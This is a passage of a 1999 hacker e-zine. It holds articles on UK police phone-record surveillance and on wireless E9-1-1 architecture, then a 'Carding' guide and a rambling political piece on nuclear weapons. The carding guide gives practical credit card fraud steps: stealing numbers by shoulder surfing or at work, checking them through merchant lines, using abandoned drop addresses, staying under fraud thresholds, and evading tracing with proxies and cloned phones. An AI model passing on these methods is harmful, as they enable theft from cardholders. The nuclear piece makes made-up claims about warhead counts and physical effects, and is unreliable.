ring. Cambridgeshire police crime analyst Cliff Nicklin said �500,000 of stolen equipment had been recovered. In theory, all requests for BT information such as the name and address of a particular subscriber, or the numbers they have called over the previous three years, have to be approved by a senior police officer, of the rank of assistant chief constable or above. In practice, the senior officers approval is delegated to more junior officers operating the link computer, and is forwarded automatically from their computers to BT - whose computer centre authenticates the request, and then downloads the information required. Foreign police and security specialists expressed surprise at the scale and growth of the British telephone surveillance system. In the US, Canada and most European states, a judicial warrant (at least) is necessary to have access to telephone call records. An official from the Canadian Security Intelligence Service said he was astonished that such privacy-sensitive information was so freely handed over. A French investigating magistrate said that in France the police would not be permitted to have such information without judicial approval. Inevitably, many of those whose telephone numbers are caught in the ever- enlarging web of a criminal investigation will be innocent of any involvement other than sharing the same dentist, doctor, school or uninvolved acquaintances. They could even have been a victim of the suspect - or just a wrong number. Unlike the guilty, however, the innocent have no right to know that their personal telephone call information has been downloaded by BT into police, customs or security service computers. The Data Protection Act requires both the police and BT to keep full records of disclosures. But the subject whose privacy has been breached is not entitled to find out that disclosure has taken place, even long after an investigation has been concluded. The BT-police interface was one of a range of novel police resources explained to delegates concerned with fighting international fraud and economic crimes, especially on the Net. They were also told about the latest developments at Britains PNC which, according to PNC director John Ladley, are leading to much better support for intelligence-led policing. Many new systems had been introduced in the mid-1990s, and more were scheduled. Among these were Quest, which can search the 5.5 million names in the Criminal Names index by reference to factors including accent, associates, habits, places and addresses, and even shoe sizes. The recently enlarged names index also includes information about DNA samples and photographs, and is linked to a 4.25 million name fingerprint index. Quest was expected to be fully operational early in 1998. For vehicles, the PNC is offering Vods - a vehicle owners descriptive search - which can answer questions such as: who owns a blue Volvo and lives in this postcode district? Searches like that have previously been too time-consuming to be used in most cases. Ladley also expects the use of automatic number plate scanners to rise dramatically as more and more police chiefs decide they want them. Currently, scanners send in up to 80,000 checks a day. The PNC anticipates that this use will soon quadruple. All such inquiries are stored for data protection and auditing purposes. This means that historical records from the ANPS system could also be mined, for example to analyse patterns of foreign travel. The little-noticed and still progressing revolution in police information technology has resulted in the employment of growing numbers of police intelligence analysts who use powerful computer systems to visualise and analyse the meaning of the massive and growing data inputs from cameras, telephones and bank records as well as traditional police sources. Neither these jobs nor the computers to back them up existed in the 1980s. Britains market leaders in intelligence systems are two Cambridge-based IT companies, who showed off their latest wares last week. One of them, i2, claims its Analysts Notebook is used by all British police forces. The Notebook was used to produce charts for such high profile cases as the Frederick and Rosemary West murder case and for City fraud investigations. i2s Web site (http://www.i2ltd.demon.co.uk) offers an animated demonstration of how investigative charts are assembled from myriad data inputs. The company describes its �network analysis sub-system as particularly useful for Internet traffic, as well as for telephone transactions and [bank] account transfers. The Harlequin group (http://www.harlequin.com) says that its system, Watson, is used around the world to investigate fraud, drug trafficking and organised crime. It too produces large and elaborate charts. Watson is designed to draw information directly from the standard Home Office large major inquiry system - Holmes for short. Watson uses artificial intelligence techniques to automatically distinguish relationships between people, places and objects from the data that is fed in. For the potentially guilty but not the innocent, recent legal changes mean that defendants can level the playing field by asking the police to hand over their databases. The 1996 Criminal Procedures and Investigations Act requires the police to record inquiries from beginning to end, and to reveal all their material - used or unused - to the Crown Prosecution Service. If information given to the CPS suggests that the the defendant might be innocent, or casts doubt on the reliabilty of prosecution witnesses, the defence has to be told. Judges have already made at least two orders for the police to copy Holmes databases for the defence to analyse. On the first occasion, however, defence lawyers had no idea how to read the data they were sent. In the second case, which is still sub judice, specialists have been retained to advise on how to interpret and analyse the police data. Both sides of the courtroom are thus having to come to terms with the new era of electronic transparency. But, as the law stands, the innocent and uninvolved still have no right to know - let alone protest - that their data too has been mined and warehoused for future use. These latest findings add more threat to us the phreaking community. -PostalPhreak -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ Wireless E-9-1-1 ]::::::::[OO--[ by digiphreq ]------------------- -->]OO[:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Wireless Enhanced 9-1-1 Service- Architecture and future. By Digiphreq Darkcyde Communications 5/8/99 darkcyde.8m.com "A nerd is somebody who's life is focused on computers and technology. A geek is somebody who's life is focused on computers and technology and likes it that way." Ye Ol'' Table of Contents I. Introduction II. A Bit of History III. FCC Regulations on Wireless 9-1-1 IV. Common Wireline 9-1-1 Service V. Issues on How to Make Wireless 9-1-1 Work 1. Stage 1 2. Stage 2 VI. Long Term & Conclusion I. Introduction: As you probably very well know Enhanced 9-1-1(E9-1-1) is the most common for of 9-1-1 these days. It is possible to find B9-1-1, if you live in the middle of no where... Anyway today wireline E9-1-1 relays all the important info on you. Location, name, and the telephone number to the dispatch telecommunicator which then accurately routes your call to the proper Emergency Dispatch Station. In theory this makes the whole process faster, as to get you help quicker. Which is often not the case. With the current day workings of wireless networks, E9-1-1 isn't really possible. They have begun to incorporate technologies to support it though. This is all because of a bunch of new regulations which the FCC placed on wireless communications, which called for an improvement of the use of E9-1-1. Originally in 1996 they created a two stage time line, which I will be explaining later. A quick overview is that Stage one will require wireless networks to provide the user's call back number and the location including which cell sector they are in. Stage two allows for a more precise pin point of the caller's location, which requires a bit more hardware and technology. I will touch on a brief history of Wireline E9-1-1 service, Wireless E9-1-1 service operations(how it should work), and a more detailed overview of the Two stage process involved in upgrading the current Wireless system. II. A bit of History: The first 9-1-1 service, was introduced in Alabama in 1968. It's also known as Basic 9-1-1 or B9-1-1. This was a very primitive version of E9-1-1 which only routed your call to a local police station. In the 1980's B9-1-1 was enhanced and there was the introduction of E9-1-1. Database Automatic _ Management Location / \ System Info | / \ | | _____ | | : : Emergency | : : Service | :_____: Adjunct | | | | | | | | | | | 5ESS switch | Central E9-1-1 | Office _________selective_____________PSAP router \ (routes Ani) \___ Displays: Location Call back # Mapping Location As you can see (sort of) when a residential or commerce line dials 911, there call goes to the central office switch which routes their call to a E9-1-1 selective router. Which then routes the call to the correct PSAP based on the user's telephone number. The phone number is passed from the PSAP to the Customer Premises Equipment (CPE), which it uses to look up an Automatic Location Information (ALI) database for the user's name and address. On top of all this the user's line number is then used as the call back number in case the caller accidentally hangs up(Ex. the killer hangs up the phone for them...) or the PSAP dispatcher needs to call the user back. III. FCC Regulations on Wireless 9-1-1 (This Was Borrowed) Points of Interest in the FCC Ruling Over Wireless 9-1-1 -Wireless carriers must support call routing based on cell sector, and they must also convey information sufficient to enable the PSAP to call back the 9-1-1 caller(that is transmit the calling party number) within 18 months of the ruling's effective date. This requirement is sometimes called Stage 1. -Carriers must support deployment of technology to determine a caller's location within 125m of accuracy for 67% of all wireless 9-1-1 calls within five years effective date. Support of a specific location determination, which will require PSAPs to be able to handle coordinates rather than street addresses, is sometimes called Stage 2. -The FCC will entertain waivers on a case by case basis for not complying with the rules. -Any call from a handset having a MIN must be transmitted to 9-1-1 even if the handset no longer has valid service. The call may not be intercepted or blocked. The local PSAP may decide whether or not to receive calls from non-MIN telephones, for example phones that were never service activated. if a PSAP requests these calls, the carrier is supposed to provide them. -The ruling applies to cellular, broadband PCS, and geographic area SMR providers (meaing SMRs that provide mass market services). Systems provided by movile satellite communications vendors, such as Motorola's Iridium, are not covered by this ruling.Because it is not a federal issue, the FCC has determined that localities and states should plan for cost recovery at their levels. Details of subsidization for deployment and nonsubscriber calls must be negotiated on local level (State or municipality, similar landline 9-1-1 subsidization). Funding should be available for both basic and enhanced 9-1-1. Conditions for Compliance: 1. PSAPs must request and be ready to handle wireless location information. 2. A cost recovery mechanism (negotiated at the local level) must be in place. PSAP Choices: Because of the two conditions for compliance PSAPs effectively choose implementation dates. PSAPs also get to choose whether they want to handle calls from handsets without MINs. Further Rulings for the Future: - Tightening of location accuracy requirements to 40 feet 90% of the time, - Availability of altitude information, - Performance criteria on time for calling completion, - Consumer Education programs for wireless 9-1-1, - Possible reconsideration of issues of PSAP choice, and - Possible requirement that the strongest signal must carry the 9-1-1 call. IV. Common Wireline 9-1-1 Service Today in most areas wireless communication networks have the ability to run off of B9-1-1. This is because of the AUTOPLEX 1000 System. Basically a caller can dial 9-1-1 and be connected to the proper ASAP based on the location of the serving cell. Location routing is accomplished with a digit by digit method. Which allows Automatic Number Identification (ANI) for Centralizing Automatic Message Accounting (CAMA) signaling to field a number corresponding to the serving cell. Upon arrival at the E9-1-1 selective router the field issued to show the PSAP for that area. The call is then routed. An alternative to this would be to populate the ANI field with a 7-digit dial-back number as opposed to the location information. The E9-1-1 selective router then assigns the incoming trunk one of four NPAs. The remaining seven NPAs complete the 10-digit dial-back number. V. Issues on How to Make Wireless 9-1-1 Work: There are several wireless problems which limit the use of E9-1-1. First CAMA trunk signaling transmits one 8-digit telephone number to the PSAP. This causes problems because it can only have 4 NPAs, and therefore cannot give caller identification while wireless subscribers are roaming. Second the caller's telephone number cannot be used to route a wireless E9-1-1 call since the caller's location depends on the Mobile Directory Number (MDN). Since a real street address cannot be associated with a MDN, the dispatcher cannot dispatch emergency services. So while this could seem kind of hopeless its really not. A lot of other ways have been devised to handle this all. Which commonly involve in band analog MultiFrequency (MF) signaling. I'll start out with some bad idea's then explain the good one. There was the Group D signaling solution. It was first intended for equal access upon long distance calls. It was able to support both a 10-digit ANI and a 10-digit dialed-digits field. Essentially the dialed-digits field could be used for the location information. The problem with this method(and you knew the would be a problem...) is that it cannot support an interface between a Mobile Switching Center (MSC) to the selective router as does Signaling System 7 (SS7). Next there was a method which used a conversion to CAMA from Group D signaling. This method is fairly complicated and really is degrading with performance, which makes it a bad choice... here goes an explanation. With the idea that MSC cannot provide SS7 connectivity with the PSTN and the 9-1-1 selective router cannot support SS7 or Group D signaling for 9-1-1 call processing. With a Group D to CAMA translation device between MSC and the selective router, it could provide signaling conversion. The translation device has a third field which sends the 10-digit dial-back number and location information to the ALI database during call set up. The device send s a special 7-digit key value in the ALI field to the selec tive router. Basically then this key would represent the cell from which the call was placed to the router. Then the 7-digit key field is routed to the PSAP during the setup. Meanwhile the ALI runs a check by the PSAP using this keys value or field, then it would return the real 10-digit MDN. Next we have a expanded CAMA signaling solution which has no practical reason for existing. It just won't work. I'll explain it anyway. The existing CAMA interswitch 9-1-1 signaling maybe built upon to support a 10-digit ANI and 10-digit location number. This requires some modifications to be made to the current PSAP hardware and the 9-1-1 selective router. This would cause a degradation of the performance due to extra MF signaling involved. Finally we have the practical solution which is what was used mainly for the Stage 1 process. Which is a solution through SS7, which should make hybrid's day. He just can't seem to get enough on SS7. The use of SS7 will be explained in my explanation of what Stage 1 was. Stage 1: Basically an entirely new architecture is needed. The common setup was to distribute the service processing across the AUTOPLEX System 1000 MSC, 5ESS-2000 Switch, Emergency Services Adjunct (ESA), ALI database, associated database management system, and the PSAP CPE. The MCS used ISDN- UP Signaling to convey a 10-digit dial-back number in the charge number parameter, as well as location information in the caller party number. The 9-1-1 selective router uses the location information to route the call to the appropriate PSAP. An ISDN PSAP is required to receive and use both the 10- digit dial-back number and the location information. Some major improvements to the AUTOPLEX System 1000 were put in to affect for Stage 1. The CAMA signaling is replaced with ISDN-UP which has the obvious advantages of being able to transmit both dial-back number and the location information as opposed to CAMA signaling 8-digit information. Also CAMA signaling only supported a 7-digit calling party number unique with one of four area codes, where as ISDN-UP will support the full 10-digit calling party number. Another major change was in MSC, which was to then use ISDN-UP signaling as well. Which could convey a 10-digit dial-back number in the charge field and a 10-digit routable Directory Number (DN) which represents the cell location and originating service provider in the called party number field. Basically this is used to reach roaming customers. The use of a DN allows a call to be routed through the PSTN to the E9-1-1 selective router grouped with the PSAP without direct connection trunks. The E9-1-1 selective router then selects the appropriate PSAP based on the serving cell, call type, and some other less important criteria. To support this, the dialed-digit routing capability must be integrated with the 5ESS-2000 switch E9-1-1 feature, thus allowing these calls to be routed using the called party number rather than the ANI. Location information, dial back number, and service provider are forwarded to the PSAP via ISDN during call setup. An ISDN PSAP is required to receive and use both the dial back number and location information encoded in the dialed digits. In the case where the PSAPs cannot support ISDN and enhanced adjunct processor interface (API) will provide the ability to support existing PSAP CPE, which uses CAMA in-band signaling. The information received via enhanced SS7 ISDN-UP from the MSC to the 5ESS-2000 will be forwarded over the API when the ESA queries made for routing information. The information will then be forwarded to the ALI over a new ESA to ALI interface. The 5ESS switch will then pass a unique 7-digit key value to the PSAP in the ANI field. When the ALI is queried by the PSAP with this value, the location, service provider and dial back number is returned to the PSAP. The PSAP equipment would need to be enhanced to provide the caller's location to the telecommunicator using a textual method whereby the called party number is used to query the ALI database, which provides location and identification of the cell/sector. Alternatively, Geographic Information Systems (GIS) can be used to provide a geographic representation of a caller's approximate location on a computer-generated map. The PSAP GIP map displays provide the dispatcher with visual identification of the caller's location (their cell/sector) in perspective of other important geological locations. The displays can pinpoint roads, addresses, buildings, houses, ems dispatch vehicles, fire hydrants, cell sites, and the service boundaries to emergency services. Ok so since this was originally put to use back in 96 and was to last as a period for approximately 18 months, it has for the most part gone in to affect in most areas. It's hard to say though, depending on the area.... Stage 2: Stage 2 is basically just an architectural build on what was created in Stage 1. The implementation was to last near 5 years. Stage 2 would bring new GIS capabilities along which would work better with the wireless E9-1-1 system. During this stage the geolocation system was required to meet the FCC's 5 year requirements for wireless E9-1-1. So the wireless system could communicate with the geolocation system to determine the position of a target mobile terminal (which has dialed 9-1-1). Alternatively, if the wireless system recognizes a mobile telephone equipped with GPS the mobile terminal could provide its current location via new air interface messages. Several technologies have been proposed to meet the FCC's long term mobile locating requirements for wireless E-9-1-1 systems. To meet the needs of the 9-1-1 community that is to those who provide the emergency response service to the public, the existing base of mobile phones must be supported without modification. Promising technologies proposed for this purpose include time difference of arrival and direction of arrival triangulation systems. Each has its advantages depending on the physical environment in which it is targeted to be deployed. In addition, advances in GPS receiver technology have made it possible to integrate GPS with wireless telephones. Which has been recently brought somewhat into the commercial market. If the mobile terminal knows its location, it makes sense to use this information for the E9-1-1 system because the GPS is potentially much more accurate than a location determined by means of time difference of arrival and direction of arrival triangulation. The geolocation information (latitude, longitude, altitude, and accuracy) will be integrated in an SS7/ISDN-UP and ISDN call set-up message for the 9-1-1 call. At this point in the evolution, SS7/ISDN- UP and the Transaction Capabilities Application Part (TCAP) signaling protocols will be modified to support transmission of the location information from the wireless system to the selective router. ISDN-UP will be used for delivery of location information with call set-up while TCAP messages will be used to support caller location tracking, which requires location updates during a call. Regardless of the location technology used by a wireless service provider, the location information will be passed through the network and used in a standard way. Therefore, the E9-1-1 communications network infrastructure will remain implemented in the wireless network. Although not required by FCC rule making, the new location information can be used to route a call to a PSAP accurately. Upgrades to support this capability include geolocation routing capabilities that will be integrated into the 5ESS-2000 switch's E9-1-1 feature, the ESA, and the DBMS. Once again, the information is delivered to the PSAP, and computer aided dispatch systems with GIS mapping will used to portray the information in a way that makes it easily understandable by the telecommunicator and responding emergency personnel. In turn, the improved location information will be reflected in the GIS map display with a pinpointed location and associated accuracy representation. A GIS based service administration capability will proceed the ability to define and dynamically change municipal jurisdictional boundaries and emergency service zones via a computerized map interface. This administration system will indirectly maintain the call routing data used by the 9-1-1 selective router. The process will simplify the administration of the 9-1-1 service by eliminating the need to share cell/sector location data among wireless, local exchange, and emergency service providers. In this environment, base station reconfigurations by a wireless service provider will no longer affect the data maintained in the PSTN and PSAP providing the end-to-end E9-1-1 service. Onward to my brief explanation of triangulation and geolocations. Network based triangulation methods of location (TDOA and DOA) require that at least two DOA or three TDOA receivers locate the target mobile terminal and that some technique be available to resolve ambiguities caused by multipath propagation. These requirements may be difficult to meet in many wireless environments causing the accuracy of the locating system to be degraded or making system deployment cost prohibitive. For example, in rural environments, cell sites cover very large geographical areas, often resulting in marginal voice coverage on the fringes of the cells. In such areas, it is unlikely that receivers in multiple cell sites would "see" the mobile terminal, thereby, making it difficult or impossible to establish the caller's location. This problem could be worked around by adding supplementary location receivers, although such deployment might be very costly for rural wireless service providers. Furthermore, in dense urban areas, the effect of multipath propagation becomes a dominant factor in deterioration of the accuracy of the locating system. Multipath propagation refers to multiple copies of the same transmitted signal are received by an antenna. Usually, the first signal arrives via the most direct path from the transmitter. Additional copies of the signal are received at later times, ranging from hundreds of nanoseconds to tens of microseconds later, and they then overlap the first signal. These copies result from the reflection of the original signal from various objects, such as buildings and vehicles. The effects of multipath propagation particularly in cities can degrade the precision of the location estimate to such a point that no added benefit can be gained over visually reporting the serving cell/sector location because urban environments often have relatively dense micro cell grids for their wireless networks. These problems are difficult to overcome without some assistance from the mobile telephone. Whether or not the FCC requirement of 125m accuracy will be technically or economically feasible in such environments is not clear. VI. Long Term & Conclusion Although recent FCC ruling only requires location accuracy of 125m in 67% of all cases, the public safety community often requires even more accurate information. Ideally an emergency unit responding to a 9-1-1 call would know exactly in which room in a skyscraper which the incident is occurring or has occurred(using for instance the ISDN-UP altitude parameter). Clearly this level of accuracy cannot be achieved cost effectively with unmodified wireless phones and today's technology. With new technology and assistance from the mobile terminal, however future land based location systems will be able to provide much better accuracy than that of the FCC Stage 2 requirements. Although such systems are not available today, several concepts have been proposed for example signpost location beacons and specialized signaling schemes optimized for location purposes. Whatever scheme becomes dominant as the technology matures, the pursuit of standard implementations is important. This will insure that the cost as sociated with an improved wireless E9-1-1 system are reduced. Basically really from a safety stand point all this is really fine in my opinion. It will help save other people and possibly yourself one day. Meanwhile this isn't really a cell user's friend. This gives the wireless service providers more control over you with this type of technology, which can be looked at as a very bad thing. Anyway, peace. -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ Carding ]::::::::[OO--[ by kryptus ]------------------------------ -->]OO[:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Hello boys and girls welcome and listen up as I am about to put some data in that little brain of yours.Well let me tell you carding has changed so much since I first started but now I have quit and have moved on to other things and would like to pass my knowledge down to you young'ns.Well to start off when trying to find a CC never go dumpster diving its nothing but a thing of the past.It can be done but is very hard to do.The best way is to shoulder surf or to work at a job where they use Credit cards such as a store in the mall.The way to find out how much is left or if it works is to use a merchant # these are used by sales people to validate that a CC works correctly.There are two ways to do this find a port site or phone # and enter in the CC info and if it works you might have yourself a CC but a much better way is either an online or phone merchant this gives you details on the limit and how much is left to spend.Next you need to find yourself a nice place to card this stuff to and no matter what never ever ever ever card to your own house.Find an abandon apartment or house and leave a note on the door if you know the delievery date or just leave it on their with a message saying I am currently moving in and please just leave my package in front of my door or behind some bushes and then you need to make sure no one is watching you make sure this drop area is far away and not next door,because when the police come by the first ask the neighbors thats you questions and investigate.Also now a days a computer monitors CC use so if someone usually orders 50-200 dollar stuff each time they use it and then a 500 dollar charge appears the card is frozen and call the owner of the card on the number given no matter what number is given to the clerk and is verified to make sure it is not fraud so I suggest only buy small things under 200 dollars that way you actually can get what you want so dont try and order a laptop trust me it wont go through.What you should buy is either clothes,CDs, RAM ,Modem,or anything thats doesn't say expensive when you think about it.Now to try and not get caught.Well either use a proxy server when you do this so your IP wont be on their server because each time you order they keep your IP for refernce to find out who made the order.Also if you are on Dial Up they can easily find you if you dont use a proxy notice when you log in notice the word LOG yes they log what phone # use this IP at what time so your ISP could easily find out who it was.Or if you call which is much better and safer call from a payphone or a cloned cell phone and never your home phone because the companies use ANI and generally *67 or but maybe an op divert will but I strongly suggest the first two methods listed.Becareful and dont get caught. This has been brought to you by Kryptus kryptus@deep-house.com -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ Political views ]::::::::[OO--[ by nino ]------------------------- -->]OO[:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: .-. .-. .--' / \ '--. '--. \ _______ / .--' \ \ .-" "-. / / \ \ / nino \ / / \ / \ / [ Poloticol Views ] \| .--. .--. |/ [ Volume One ] | )/ | | \( | [ nino ] |/ \__/ \__/ \| [] / /^\ \ \__ '=' __/ |\ /| |\'"VUUUV"'/| \ `"""""""` / [ Greets : Darkcyde ] `-._____.-' [ hybrid ] / / \ \ [ darkcyde.8m.com ] / / \ \ / / \ \ ,-' ( ) `-, `-'._) (_.'-` -------------------------------------------------------------------- Politicol views: .'`Nuclear Warheads`'. Many of us know about the United States Army, And how they work. But allow me to explain in detail some of the problems the U.S Faces By witholding a Nuclear Warhead. The Major problem is that there are other countries trying to make warheads to be able to compete in the United States Strategic Warfare, Minor Authority in communications and prospects. These countries such as kuwait, kosovo, and many others feel like they are being controled by the U.S military and the army. But what is it they Realy Fear ? is it our population count for our armed services,? is it out communications\technology power ? or is it the Nuclear Bombs, Yes indeed. it is. The United states have 7 nuvlear Warheads known to public that are stationed in multiple spots around the country. There is just one problem. what about the other 11 Secret Warheads that the U.S has. ? yes indeed. the United States Government has a total of 18 nuclear warheads ready for use. That is alot of power. The only problem is. They Are more chemical then anything. they use a substance known as Petrolium and mix it with quantum levels of cells and chemicals that are More deadly then the bomb itself. Remember hearing about the 'Black plague' in or at school ? well. there is a certain amount of volume\mass mixtures that create a deadly killer cell that we breathe. this cell attacks the immune system and creates visionary problems as well as breathing. sooner or later u will die. there is no cure. there is alot more to it then just that but allow me to tell you about the major problem that i 'View' in my own mind. The united states government has 18 nuclear warheads ready for use in case of a national emergancy. but think of it this way. other countries have these chemical weapons to. such as Russia \Uk this creates a problem now. if we ever have a nuclear war. and we bomb a country with nuclear weapons who in return does the same to us our planet (Earth) 'could' be knocked off its Axis . Ever think of that ? or could cause a meltdown. or a series of storms that will certainly take most of us out. but another problem is a nuclear bomb has more power then that comet that wiped out the dinosaurs. we could not possibly survive a nuclear war with another country. It is utterly impossible. and dont say 'i have a bomb shelter and food rations' because what happens when u run out of water\food. u will have nothing. or what happens is the earth is knocked off its Axis ? a bomb shelter wont protect u from being killed by gravity. Hell nuclear bombs react to Metalic and electrical machinery, almost like a 500 st magnet. ur watches will stop. radios will be friend cars will be ripped apart by radiation, gold teeth will be forcfully pulled from ones mouth, and ur bomb shelter could have a 99% chance of being torn out of the ground and torn to pieces. depending on ur location. the nuclear warheads that russia posess can destroy alot of things. say for instance they droped the bomb on our states capitol. half the states around it would be utterly destroyed not to mention the others that are left will suffer from raditation cancer. poisoning and also no light. if it shifts the gravitational pull u will be ripped apart not only from the lack of air to breathe but because the radiation opens the poors of your skin and eats away at you protective white cells' There isnt much we can do about this right now. but maybe just maybe some of you who are leaders will try as hard as they can to speak to the public and rage protests against nuclear warheads. and maybe even war. ---------------------------------------- nino ---------------------- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ Outness ]::::::::[OO--[ by hybrid ]------------------------------- -->]OO[:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: HEH, thats is for this issue of f41th dudes. We really need some feedback on our zine so if theres anyone out there that wants to give us a slagging or anything, email hybrid@phunc.com. You can get f41th from www.darkcyde.8m.com www.darkcyde.system7.org or from my site www.phunc.com/~hybrid. Shouts to everyone in #darkcyde EFNET, werd, also #9x + #b4b0. Hope you enjoyed f41th issue 5, keep reading.. peace. O y34H, alm0st fOrgOt b1tch3z, dOn't fOrg3t tO t4k3 j00r k4fF3n� p1llz.. h4x0r1ng l1f3 jUsT wOulDn`T b3 d4 s4m3 w1thOut `3m.. *WERD* [c] D4RKCYDE 1999 (darkcyde.8m.com | darkcyde.system7.org) #darkcyde EFNET